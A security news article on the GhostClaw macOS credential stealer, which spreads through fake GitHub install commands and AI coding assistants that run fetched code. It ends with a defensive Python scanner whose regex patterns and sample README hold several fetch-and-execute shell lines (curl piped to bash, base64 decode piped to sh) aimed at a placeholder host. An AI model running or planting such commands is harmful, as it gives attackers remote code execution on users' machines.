GhostClaw Malware Uses Routine GitHub Habits to Target Mac Users


A new macOS information stealer called GhostClaw is spreading across GitHub and AI developer tools. Instead of relying on complex software exploits, this malware takes advantage of the normal routines developers follow every day. It hides inside fake software development kits, trading tools, and utility repositories.

Because developers are used to copying setup commands directly from project instructions, GhostClaw reaches their machines easily. It works by making the malicious code look like a standard software installation step.

How the GhostClaw attack actually works

Once a developer runs a contaminated install command, the malware quietly downloads a remote script in the background. It does not exploit macOS itself. Instead, it triggers fake password prompts that look exactly like standard Apple security pop-ups. When users type in their credentials, GhostClaw steals that data.

The problem gets worse with automated AI coding assistants. These tools often fetch and run external code blocks automatically, which bypasses normal human review completely.

There are many ways to protect your computer

You can stop this threat by changing a few daily habits. Don’t run any command that pipes a download straight into your shell without reading it first. Download the script and check the code yourself. It’s also smart to look at a GitHub repository’s history. Sudden changes to setup instructions or suspicious gaps in updates are big warning signs.

Finally, avoid giving system permissions unless you are sure about the tool asking for them. Limit what your automated coding extensions can run on their own.
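One way to apply the "read it first" habit before copying anything from a README is sketched below. It is an added example, not code from GhostClaw research or any project named here. The patterns are generic download-and-execute shell idioms chosen as an assumption, not published GhostClaw indicators, and the sample instructions are constructed.

```python
import re

# Heuristic "download and execute in one step" shapes. These are generic shell
# idioms chosen for this example (assumption), not published GhostClaw indicators.
SHELL = r"(?:(?:ba|z|da)?sh|python3?)\b"
FETCH = r"\b(?:curl|wget)\b"
PATTERNS = {
    "pipe-to-shell": re.compile(FETCH + r"[^|\n]*\|\s*(?:sudo\s+)?" + SHELL),
    "shell-c-substitution": re.compile(r"\b" + SHELL + r"\s+-c\s+[\"']?\$\(\s*" + FETCH),
    "process-substitution": re.compile(r"\b" + SHELL + r"\s+<\(\s*" + FETCH),
    "decode-to-shell": re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b[^|\n]*\|\s*" + SHELL),
}

def scan_instructions(text):
    """Return (line_no, rule, command) for each fetch-and-execute command found."""
    findings, buf, start = [], "", 0
    for no, line in enumerate(text.splitlines(), 1):
        if not buf:
            start = no                      # first physical line of this command
        stripped = line.rstrip()
        if stripped.endswith("\\"):         # shell line continuation: keep joining
            buf += stripped[:-1] + " "
            continue
        command, buf = (buf + stripped).strip(), ""
        for rule, pattern in PATTERNS.items():
            if pattern.search(command):
                findings.append((start, rule, command))
    return findings

# Constructed sample of setup instructions (example.invalid never resolves).
SAMPLE_README = """\
## Quick start
curl -fsSL https://example.invalid/install.sh | bash
/bin/bash -c "$(curl -fsSL https://example.invalid/setup.sh)"
curl -fsSL https://example.invalid/i.sh \\
  | sudo sh
echo "$PAYLOAD" | base64 -d | sh
## Reviewable alternative
curl -fsSL -o install.sh https://example.invalid/install.sh
less install.sh && bash install.sh
"""

if __name__ == "__main__":
    for line_no, rule, command in scan_instructions(SAMPLE_README):
        print(f"line {line_no}: {rule}: {command}")
```

A hit means the command would execute code nobody has read yet, not that the repository is malicious. The reviewable alternative at the end of the sample (save to a file, read it, then run it) is not flagged.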
